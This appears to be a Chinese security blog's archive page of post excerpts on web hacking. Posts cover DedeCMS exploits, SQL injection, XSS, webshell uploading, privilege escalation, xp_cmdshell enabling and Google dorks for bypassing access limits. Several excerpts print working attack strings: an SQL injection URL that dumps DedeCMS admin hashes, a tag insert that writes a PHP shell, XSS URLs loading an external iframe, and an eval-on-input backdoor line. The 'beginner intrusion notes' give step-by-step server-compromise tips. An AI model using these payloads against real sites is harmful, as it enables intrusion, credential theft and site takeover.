摘要:漏洞挖掘分析技术有多种,只应用一种漏洞挖掘技术,是很难完成分析工作的,一般是将几种漏洞挖掘技术优化组合,寻求效率和质量的均衡。2.1.人工分析人工分析是一种灰盒分析技术。针对被分析目标程序,手工构造特殊输入条件,观察输出、目标状态变化等,获得漏洞的分析技术。输入包括有效的和无效的输入,输出包括正常输
阅读全文
WEB漏洞挖掘技术总结
摘要:漏洞挖掘技术一直是网络攻击者最感兴趣的问题,漏洞挖掘的范围也在随着技术的提升而有所变化。在前期针对缓冲区溢出、格式化字符串、堆溢出、lib库溢出等技术都是针对ELF文件(Linux可执行文件)或者PE文件(Win可执行文件)的漏洞挖掘技术。 在针对ELF文件、PE文件(*.exe与*.dll)的漏洞挖掘过程中,出现了很多的漏洞挖掘技术,但是针对PE文件、ELF文件的漏洞挖掘始终停留在了黑盒测试(包括单元黑盒测试)源代码审计等办法。通过RATS等源代码审计软件可以找到部分源代码级别的漏洞信息,但是毕竟源代码审计软件寻找的多数为strcpy memcpy等存在缓冲区溢出遗患的C函数,所以通过审计.
阅读全文
漏洞挖掘分析技术综述
摘要:1.引言网络安全已成为人们日益关注的重要问题。据CNCERT/CC2007年网络安全工作报告的统计,近年来漏洞数量呈现明显上升趋势,不仅如此,新漏洞从公布到被利用的时间越来越短,黑客对发布的漏洞信息进行分析研究,往往在极短时间内就能成功利用这些漏洞。除了利用已知漏洞,黑客们也善于挖掘并利用一些尚未公
阅读全文
RSA大会播报 – 2014最佳安全博客提名
摘要:今年美国RSA大会将在这个月的23-28号举行,每年大会上都会评出过去一年来业内最佳安全博客(Security Bloggers Network Social Security Awards 2014),该投票已于2月14日停止了投票,大奖得主将于RSA大会上公布。现在我们抢先看看都有哪些提名。(部分有重复,排名不分先后),最终结果且 听下周分解。最佳企业安全博客提名:Juniper(网络厂商,不用多介绍):http://forums.juniper.net/t5/Security-Mobility-Now/bg-p/networkingnowNorse(提供前摄性的安全解决方案,基于dark
阅读全文
nmap速查表v1.0
摘要:基本语法:#nmap [扫描方式] [命令选项] {目标}扫描目标格式:IPv4 地址: 192.168.1.1IPv6 地址:AABB:CCDD::FF%eth0主机名:www.target.tgtIP 地址范围:192.168.0-255.0-255掩码格式:192.168.0.0/16使用列表文件:-iL 设置扫描端口无端口范围时扫描1000 个常用端口-F 扫描100个最常用端口-p- 指定端口范围-p,,…. 端口列表-pU:53,U:110,T20-445 TCP&UDP结合-r 线性扫描(不是随机扫描)–top-ports 扫描n个最常用端口-p-65535 忽略初始端.
阅读全文
sqlmap使用帮助文档(1)
摘要:当给sqlmap这么一个url的时候,它会:1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆查询注入,可以同时执行多条语句的执行时的注入。sqlmap支持的数据库有:MySQL, Or
阅读全文
新手入侵笔记
摘要:【 拿shell 】1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本打开图片木马在代码最前面加上gif89a,一般就能逃过拦截系统了。3.上传图片木马把地址复制到数据库备份里备份成asp木马,有时不成功就利用IIs6.0解析漏洞尝试突破。4.上传图片木马再用抓包工具进行抓包,用明小子的综合上传功能,复制上传地址及cookies填到对应的框里,点击上传即可。5.当后台有数据库备份
阅读全文
新手提权笔记
摘要:【 web提权 】1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都可以。4.cmd命令:systeminfo,看看有没有KB952004、KB95657
阅读全文
Hydra 无法爆破SSH 解决办法
摘要:今天测试ssh爆破,发现使用hydra有些问题,windows版本没有协议支持其他的貌似都可以,kali本身也有hydra环境但是也会出现问题,所以就搜了一些资料贴在这里,当然这也是我测试过的,重新编译安装确实可以用了。Code:apt-get purge hydraapt-get install cmake libssl-devcd /usr/local/srcwget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gztar zxf libssh-0.4.8.tar.gzcd libssh-0.4.8mkdir buildcd build
阅读全文
WEB渗透之对于开了3389远程连接不上的总结
摘要:对于开了3389,连接不上,有几个方面的原因,我来总结下,哇咔咔,这几天提好几台服务器都TM这样,分析下,原因1、远程桌面端口被更改。2、对方服务器处于内网。3、防火墙拦截。4、TCP/IP安全限制。好了,知道原因了,我们来一个一个思考解决方法(部分引用):远程桌面端口被更改解决方法:现在一般的asp大马都有探测服务器的功能,在权限还行的情况下都可以直接查看远程(TerminalService)端口,或者可以查看注册表也可以得到远程桌面端口,asp权限不行,在支持aspx的时候就换aspx查看注册表。对方服务器处于内网解决方法:这种情况我们可以使用lcx做端口转发,不知道的或者没有的就百度“l
阅读全文
Heap Spray原理
摘要:Heap Spray定义基本描述Heap Spray并没有一个官方的正式定义,毕竟这是漏洞攻击技术的一部分。但是我们可以根据它的特点自己来简单总结一下。Heap Spray是在shellcode的前面加上大量的slide code(滑板指令),组成一个注入代码段。然后向系统申请大量内存,并且反复用注入代码段来填充。这样就使得进程的地址空间被大量的注入代码所占据。然后结合其他的漏洞攻击技术控制程序流,使得程序执行到堆上,最终将导致shellcode的执行。传统slide code(滑板指令)一般是NOP指令,但是随着一些新的攻击技术的出现,逐渐开始使用更多的类NOP指令,譬如0x0C(0x0C0
阅读全文
MD5在线查询的实现
摘要:#!/usr/bin/env python#-*-coding:UTF-8-*-'''快速查询md5值工具,通过模拟浏览器发包请求http://cmd5.com和http://xmd5.org两个网站进行在线查询。By Terry'''importurllibimporturllib2importreimportsysdefxmd5(hash_str):##http://xmd5.org以GET方式提交请求,模拟浏览器发送GET请求包。#xmd_url='http://www.xmd5.org/md5/search.asp?hash=&#
阅读全文
ShellCode的编写入门
摘要:上次学习了下堆喷漏洞的原理,虽说之前有学习过缓冲区溢出的原理,但还没了解过堆喷这个概念,于是趁此机会学习了,顺便复习了缓冲区溢出这块知识,之前由于各种原因对Shellcode的编写只是了解个大概,并没有真正动手写过一个Shellcode。眼前遇到个堆喷漏洞找Shellcode时就下决定自己写个Shellcode,考虑到时间和精力的有限就写个计算器简单的练练手。注:以下在XP SP3+VC6.0编译成功一、首先写个简单的调用计算器的程序。注:以下在XP SP3+VC6.0编译成功一、首先写个简单的调用计算器的程序。#include"windows.h"intmain(){Lo
阅读全文
vxer
摘要:Virus Maker 或者 Virus eXchanger 的简称,(有时候中文也叫做毒客),是一群追求完美、极致代码的病毒程序员。1.VXer简介:VXer热爱汇编,熟悉各种处理器架构,致力于挑战汇编编码的极限。2.中国VXer:02-04年是国内VXer 最活跃的年代,CVC 社区高手云集,气
阅读全文
GOOGLE突破图书馆入口IP限制之技巧
摘要:很多图书馆都要注册或要本地IP才能浏览或下载图书,有没有另类的快速办法能快速突破图书馆的入口,能随意地下载图书呢?希望大家在GOOGLE里试试这个:“index of/ ” inurl:lib你将进入许多图书馆,并且一定能下载自己喜欢的书籍。1、输入:“index of /” cnki ,可以找到许多图书馆的CNKI、VIP、超星等入口!2、输入:“index of /” ppt ,可以突破网站入口下载powerpint作品!3、输入:“index of /” mp3 ,可以突破网站入口下载mp3、rm等影视作品!4、输入:“index of /” swf ,可以突破网站入口下载fl...
阅读全文
突破IP限制登入网站后台
摘要:后台:http://www.zhuna.cn/sys_admin/输入账号密码点击确定后,跳转到登录界面:http://www.zhuna.cn/sys_admin/login.php很自然的觉得后台部分页面没有访问控制,可以直接进行请求查看。(同时也怀疑可能存在JS访问绕过问题,禁用JS后再进行访问,发现依然如此,故而排除JS绕过的想法。)通过查看HTML源代码,很容易的找到菜单页面名称:http://www.zhuna.cn/sys_admin/menu.php查看menu.php页面的HTML源代码,逐个请求各超链接页面,不难发现其中部分页面是不需要身份验证的(不会跳转到登录页面):以其
阅读全文
登入爱丽网后台(非JS绕过、非盲打、非IP欺骗)
摘要:后台:http://wed.27.cn/marry/marryadmin/web/login.php不难猜解到后台管理的相关页面名称(不存在的页面服务器返回404,而存在的页面会直接跳转到上面的登录页面)。请求不存在的页面:用firefox禁用JS后请求admin.php页面,依然跳转到登录页面,说明不存在JS绕过的问题。鉴于 WooYun: 我是如何登录住哪网后台的(突破IP限制!) 的灵感,用http editor请求看看,奇迹出现了:如此是何道理?浏览器请求和工具请求没什么区别,怎么就是不一样的结果呢?工具发送的请求也不带有合法的cookie信息,排除cookie的因素,而前面也排除了J
阅读全文
dedecms织梦 标签远程文件写入漏洞
摘要:测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!前题条件,必须准备好自己的dede数据库,然后插入数据:insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp =@fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');再用下面
阅读全文
Dede(织梦) CMS SQL Injection Vulnerability
摘要:测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!# Dede Cms All Versions Sql Vulnerability Exploit# # Date: 30/12/2011 - 13:00# Author: [ CWH ] | Finded By : Nafsh# We Are : Mr.M4st3r , Nafsh , Skote_Vahshat , HijaX# Support: Cyberwh.org# Mail: Nafsh@live.com# Software Website: http://www.dedecm
阅读全文
dedecms v5.5 final getwebshell exploit(datalistcp.class.php)
摘要:测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
阅读全文
DEDECMS网站管理系统Get Shell漏洞
摘要:漏洞版本:DEDECMS 5.3/5.6漏洞描述:DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于 DedeCms核心,是目前国内应用最广泛的php类CMS系统。article_add.php 1. ........................ 2. else if($dopost=='save') 3. { 4...
阅读全文
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
摘要:漏洞版本:Dedecms 5.5漏洞描述:漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!Dedecms v55 RCE Exploit Codz By flyh4t ---------- Dedecms v55 RCE Exploit Co
阅读全文
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
摘要:漏洞版本:DEDECMS 5.1漏洞描述:同样是在magic_quotes_gpc=off的情况下可用此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl......$urlindex = 0;if(empty($arcID)){$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");//此处$arcurl没有过滤if(is_array($row))
阅读全文
织梦(DEDE)CMS V5.3 覆盖任意变量导致远程包含漏洞
摘要:漏洞版本:织梦(DEDE)CMS V5.3漏洞描述:织梦内容管理系统,最强大的中文开源CMS网站管理项目,使用PHP+MySQL架构。在文件include/common.inc.php中:foreach($_REQUEST as $_k=>$_v)//第10行{if( strlen($_k)>0&& eregi('^(_|cfg_|GLOBALS)',$_k)&&!isset($_COOKIE[$_k])){exit('Request var not allow!');}}//如果以cfg_开头的变量以cookie方式
阅读全文
dedecms织梦 v5.5 两处跨站漏洞
摘要:漏洞版本:dedecms织梦5.5漏洞描述:北洋贱队(http://bbs.seceye.org)首发demo1:http://www.dedecms.com/plus/search.php?keyword=%22%3E%3Ciframe%20src=http://www.gohack.org%3E&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.gohac
阅读全文
dedecms织梦 v5.6 两处跨站漏洞
摘要:漏洞版本:dedecms织梦 v5.6漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。demo1:http://www.test.com/plus/search.php?keyword=zhuba&s
阅读全文
Dedecms <= V5.6 Final模板执行漏洞
摘要:漏洞版本:Dedecms V5.6 Final漏洞描述:Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去,然后通过SQL注入修改附加表的模板路径为我们上传的模板路径,模板解析类:include/inc_archives_view.php没有对模板路径及名称做任何限制,则可以成功执行恶意代码。1、member/article_edit.php文件(注入)://漏洞在member文件夹下普遍存在,$dede_addonfields是由用户提交的,可以被伪造,伪造成功即可带入sql语句,于是我们可以给附加
阅读全文
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
摘要:漏洞版本:DedeCms V5.6 漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。plus/advancedsearch.php$sql 变量未初始化。导致鸡助漏洞if($mid == 0) //必须绕过.
阅读全文
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
摘要:漏洞版本:DedeCmsV5.6 漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。1 respond();22 ShowMsg($msg,"javascript:;",0,3000);23 exit(); 24 }25 ?>测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!http://www.ssvdb.com/plus/carbuyaction.ph...
阅读全文
织梦(Dedecms)V5.6 远程文件删除漏洞
摘要:漏洞版本:DedeCmsV5.6漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。edit_face.phpelse if($dopost=='delold') //45行{ if(empty($oldface)) { ShowMsg("没有可删除的头像!", "-1"); exit(); } $userdir = $cfg_u...
阅读全文
DeDeCMS(织梦)变量覆盖0day getshell
摘要:测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!#!usr/bin/php -w12){echo "[*] Exploit Success \n";if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;if($aid==2)echo "[*]Shell:".$url."/$path/fuck.php\n" ;if($aid==3)echo "[*]Sh
阅读全文
DEDECMS全版本gotopage变量XSS ROOTKIT 0DAY
摘要:影响版本:DEDECMS全版本漏洞描叙:DEDECMS后台登陆模板中的gotopage变量未效验传入数据,导致XSS漏洞。\dede\templets\login.htm65行左右" />由于DEDECMS的全局变量注册机制,该变量内容可以被COOKIE变量覆盖,COOKIE可以在客户端持久化存储,最终导致一个XSS ROOTKIT。漏洞危害:管理员在触发DEDECMS任意的XSS漏洞(如留言本XSS)后,可以通过该漏洞永久劫持覆盖gotopage变量,在DEDECMS的后台登陆页面永久嵌入任意的恶意代码。验证:1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT
阅读全文
织梦(dedecms) 5.7 /plus/car.php sql注入0day
摘要:测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!")};';$buffer = POST($host,80,$url,$data,30);echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";}else {echo "Sorry,target may not exist this bug.";exit;}function POST($host,$port,$path,$data,$timeout, $cookie='
阅读全文
DEDECMS 5.7之前版本远程SQL注入漏洞
摘要:2012/4/29 凌晨知道创宇安全研究团队截获到最新DEDECMS SQL注入 0day,官网目前提供下载的最新版5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。知道创宇给出三种临时解决方案:方案一、临时补丁,需要四步1. 确保您的magic_quotes_gpc = On详细开启方式:打开php安装目录中的php.ini(若您使用的是appserv等集成环境,php.ini可能在系统盘符:\windows\php.ini),搜索magic_quotes_gpc,将其设置为On。2./plus/carbuyaction.p
阅读全文
Dedecms v5.7 最新注入分析
摘要:该漏洞是cyg07在乌云提交的, 漏洞文件: plus\feedback.php。存在问题的代码:view source01...02if($comtype=='comments')03{04$arctitle=addslashes($title);05if($msg!='')06{//$typeid变量未做初始化07$inquery= "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`
阅读全文
DedeCMS 5.7 后门漏洞
摘要:简要描述:DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似被植入一句话后门前几日下载并不存在此代码详细说明:shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));漏洞证明:shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));修复方案:删除@eval(file_get_contents('php://input'));
阅读全文
DedeCms 5.x 本地文件包含漏洞(respond方法)
摘要:漏洞版本:DedeCms 5.x漏洞描述:DedeCms是免费的PHP网站内容管理系统。plus/carbuyaction.php里没有对变量进行严格的过滤出现漏洞的两个文件为:Include/payment/alipay.phpInclude/payment/yeepay.php漏洞均出现在respond方法里Include/payment/alipay.php......function respond(){if(!empty($_POST)){foreach($_POST as $key => $data){ $_GET[$key]= $data;}}/* 引入配置文件 *
阅读全文
DedeCMS V5.7 Dialog目录下配置文件XSS漏洞
摘要:漏洞地址及证明:/include/dialog/config.php?adminDirHand="/>
阅读全文
dede5.7前台插入恶意JS代码
摘要:这个问题应该很久了 最近发现有用这个的蠕虫,dede 前台提交友情链接 只用htmlspecialchars简单处理了一下 可以插入代码plus/flink_add.php 提交:表单中提交 图片地址http://111.cc ' onerror='alert(98);'http://111.cc 'onerror=location.href='http://www.baidu.com只用htmlspecialchars做了处理 没有判断数据有效性?1234567891011121314151617$msg = htmlspecialchars($msg
阅读全文
DedeCMS全版本通杀SQL注入漏洞利用代码
摘要:EXP:Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'ormid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_
阅读全文
get_magic_quotes_gpc函数
摘要:magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误在magic_quotes_gpc=On的情况下,如果输入的数据有单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线。这些转义是必须的,如果这个选项为off,那么我们就必须调用addslashes这个函数来为字符串增加转义。正是因为这个选项必须为On,但是又让用户进行配置的矛盾,在PHP6中删除了这个选项,一切的编程都需要在mag
阅读全文
dedecms最新版本修改任意管理员漏洞
摘要:此漏洞无视gpc转义,过80sec注入防御。补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。include/dedesql.class.php12345678910111213if(isset($GLOBALS['arrs1'])){$v1=$v2='';for($i=0;isset($arrs1[$i]);$i++){$v1.=chr($arrs1[$i]);}for($i=0;isset($arrs2[$i]);$i++){$v2.=
阅读全文
php实现文件安全下载
摘要:publicfunction downloads($name){ $name_tmp = explode("_",$name); $type = $name_tmp[0]; $file_time = explode(".",$name_tmp[3]); $file_time = $file_time[0]; $file_date = date("Y/md",$file_time); $file_dir = SITE_PATH."/data/uploads/$type/$file_date/";if(!file_ex
阅读全文
网站后台查找方法总结
摘要:经过很多次的渗透经验,我总结了一套网站后台查找的方法,写出来供大家分享:步骤如下:1.查找网站的robots.txt文件或者sitemap.xml文件,里面有很多目录可利用2.使用御剑逐级渗透,一般都能找到网站后台(找数据库文件也是如此)
阅读全文
WinsockExpert+NC抓包上传之拿WEBSHELL
摘要:知识补充: nc上传漏洞在原理上同动网上传漏洞一样,都是利用计算机在读取字符串时,遇到'\0'(00)时,认为字符串结束了,从而丢掉后面的字符串,正如unicode编码特性一样,可被人利用,尽管在这里网站过滤了路径,但任然从用户处接收文件名,我们同样可以在字符串中构造'\0'(00),又在结尾处构造
阅读全文
BurpSuite之SQL Injection
摘要:BurpSuite之SQL Injection[平台]:mutillidae[工具]BurpSuite 1.4.07 + FireFox1:安装配置mutillidae如果遇到问题,开下面的帖子.http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-102:SQL Injection测试选择“OWASP Top 10″ —>> ”A1 - Injection” —>> ”SQLi - Extract Data” —>> ”U
阅读全文
BurpSuite之HTTP brute暴力破解
摘要:常规的对username/passwprd进行payload测试,我想大家应该没有什么问题,但对于Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=这样的问题,很多朋友疑惑了.之前,我记得我介绍过burpsuite的intruder功能(BurpSuite之SQL Injection),想必很多人没什么印象,在此,以HTTP brute重提intruder功能.以下面案例进行说明(只作演示之用,具体以自己的目标为准):Auth=dXNlcjpwYXNzd29yZA==处,也就是我们的关键位置.那么具体该如何做呢?大致操作过程如下:1.解密base64字符
阅读全文
BurpSuite实例教程
摘要:很久以前就看到了Burp suite这个工具了,当时感觉好NB,但全英文的用起来很是蛋疼,网上也没找到什么教程,就把这事给忘了。今天准备开始好好学习这个渗透神器,也正好给大家分享下。(注:内容大部分是百度的,我只是分享下自已的学习过程)什么是BurpSuiteBurp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。Burp Suite 能高效率地与单个工具一起工作,例如:一个中心站点地图是用于汇总收集到的目标应用
阅读全文
截断上传原理剖析
摘要:截断上传大家一定不陌生,可能你也看过很多动画教程,人家都能顺利的上传成功,而但自己操作时却总是失败,为什么会这样? 其实我一开始接触“截断”这个概念时感到很神奇,也觉得很茫然。神奇的是它竟能突破上传限制,茫然的是什么情况下才可以用?哪些上传能截断,哪些又不能。。。带着这些问题,我试着去找上传,试着用
阅读全文
web漏洞总结
摘要:目录:1.sql注入获取数据库信息2.sql注入绕过管理后台登录3.反射型xss4.存储型xss5.csrf6.文件上传7.暴力破解8.目录遍历9.权限跨越10.文件包含11.未知漏洞web漏洞演练平台:https://pentesterlab.com/web_for_pentester.htmlweb漏洞演练平台使用手册及答案详解:https://pentesterlab.com/web_for_pentester/web_for_pentester.pdf摘自:http://www.i0day.com/
阅读全文
如何安全的存储用户的密码
摘要:大多数的web开发者都会遇到设计用户账号系统的需求。账号系统最重要的一个方面就是如何保护用户的密码。一些大公司的用户数据库泄露事件也时有发生,所以我们必须采取一些措施来保护用户的密码,即使网站被攻破的情况下也不会造成较大的危害。如果你还在存储用户密码的MD5,那可真的有点弱了。赶紧来看看这篇文章吧。保护密码最好的的方式就是使用带盐的密码hash(salted password hashing).对密码进行hash操作是一件很简单的事情,但是很多人都犯了错。接下来我希望可以详细的阐述如何恰当的对密码进行hash,以及为什么要这样做。重要提醒如果你打算自己写一段代码来进行密码hash,那么赶紧停下
阅读全文
突破XSS字符数量限制执行任意JS代码
摘要:一、综述有些XSS漏洞由于字符数量有限制而没法有效的利用,只能弹出一个对话框来YY,本文主要讨论如何突破字符数量的限制进行有效的利用,这里对有效利用的定义是可以不受限制执行任意JS。对于跨站师们来说,研究极端情况下XSS利用的可能性是一种乐趣;对于产品安全人员来说,不受限制的利用的可能是提供给开发人员最有力的证据,要求他们重视并修补这些极端情况下的XSS漏洞。突破的方法有很多种,但是突破的思想基本都一样,那就是执行可以控制的不受限制的数据。二、突破方法2.1 利用HTML上下文中其他可以控制的数据可控的安全的数据alert(/xss/);由于XSS点有字符数量限制,所以这里只能弹框,那么我们可
阅读全文
垂直搜索技术
摘要:垂直搜索引擎是针对某一个行业的专业搜索引擎,是搜索引擎的细分和延伸,是对网页库中的某类专门的信息进行一次整合,定向分字段抽取出需要的数据进行处理后再以某种形式返回给用户。垂直搜索是相对通用搜索引擎的信息量大、查询不准确、深度不够等提出来的新的搜索引擎服务模式,通过针对某一特定领域、某一特定人群或某一特定需求提供的有一定价值的信息和相关服务。其特点就是“专、精、深”,且具有行业色彩,相比较通用搜索引擎的海量信息无序化,垂直搜索引擎则显得更加专注、具体和深入。定义垂直搜索引擎是应用于某一个行业、专业的搜索引擎,是搜索引擎的延伸和应用细分化。垂直搜索引擎为用户提供的并不是上百甚至上千万相关网页,而是
阅读全文
dll劫持技术
摘要:DLL劫持技术当一个可执行文件运行时,Windows加载器将可执行模块映射到进程的地址空间中,加载器分析可执行模块的输入表,并设法找出任何需要的DLL,并将它们映射到进程的地址空间中。DLL劫持原理由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。利用这个特点,先伪造一个系统同名的DLL,提供同样的输出表,每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的DLL,完成相关功能后,再跳到系统DLL同名函数里执
阅读全文
存储过程之基本语法
摘要:Sql存储过程基本语法之简介:存储过程(Stored Procedure), 是一组为了完成特定功能的SQL 语句,集经编译后存储在数据库中,用户通过指定存储过程的名字并给出参数,如果该存储过程带有参数来执行它,在SQL Server 的系列版本中,存储过程分为两类:系统提供的存储过程和用户自定义存储过程。系统SP,主要存储master 数据库中,并以sp_为前缀并且系统存储过程主要是从系统表中获取信息,从而为系统管理员管理SQL Server。 用户自定义存储过程是由用户创建,并能完成某一特定功能,如:查询用户所需数据信息的存储过程。存储过程具有以下优点1.存储过程允许标准组件式编程(模块化
阅读全文
SQL存储过程概念剖析
摘要:一、SQL存储过程的概念,优点及语法定义:将常用的或很复杂的工作,预先用SQL语句写好并用一个指定的名称存储起来, 那么以后要叫数据库提供与已定义好的存储过程的功能相同的服务时,只需调用execute,即可自动完成命令。讲到这里,可能有人要问:这么说SQL存储过程就是一堆SQL语句而已啊? Microsoft公司为什么还要添加这个技术呢?那么存储过程与一般的SQL语句有什么区别呢?SQL存储过程的优点:1.存储过程只在创造时进行编译,以后每次执行存储过程都不需再重新编译,而一般SQL语句每执行一次就编译一次,所以使用存储过程可提高数据库执行速度。2.当对数据库进行复杂操作时(如对多个表进行Up
阅读全文
SQL2005之SA提权总结
摘要:首先,看看xp_cmdshell存在不,不存在的话先恢复下。Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;然后,Exec master.dbo.xp_cmdshell 'net user' 持行命令。SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关
阅读全文
关于存储过程
摘要:SQL2005 在默认的设置中是删除了 XP_CMDSHELL的,因此也在注射过程中产生了点困难。后来经过查看MSSQL2005的手册才知道情况原来如此:用下面一句话就可以了解决了。EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;关闭一样.只是将上面的后面的那个"1"改成"0"就可以了.EXEC sp_configure 'show advanced opt
阅读全文
xss实例-输出在<script></script>之间的情况
摘要:1. 我们找到这么一个点,也是输入和输出都未过滤的一个点。相比教程第一例,其特殊之处在于,是输出在了 之间。http://activity.soso.com/common/setParentsInfo.php?callback=aaaaaaaaa如下图:callback参数未做过滤。 在【查看源代码】下,我们可以看到。缺陷网页源代码:2. 碰到这种情况,我们一般有以下解法。2.1 首先判断,是否过滤了 , / 等符号,2.2 如果都没有过滤,恭喜你,一般可以直接XSS了。代码如下:http://activity.soso.com/common/setParentsInfo.php?callb.
阅读全文
xss实例-什么都没过滤的情况
摘要:1. XSS的存在,一定是伴随着输入,与输出2个概念的。2. 要想过滤掉XSS,你可以在输入层面过滤,也可以在输出层面过滤。3. 如果输入和输出都没过滤。 那么漏洞将是显而易见的。4. 作为第一个最基础的例子, 我们拿出的是一个什么都没过滤(其实还是有些转义的,主要没过滤)的例子。 这种例子出现在腾讯这种大网站的概率不是很高。 但是还是让我找到了一个。5. http://app.data.qq.com/?umod=commentsoutlet&act=count&siteid=3&libid=9&dataid=1480&score=1&func=
阅读全文
xss概念剖析
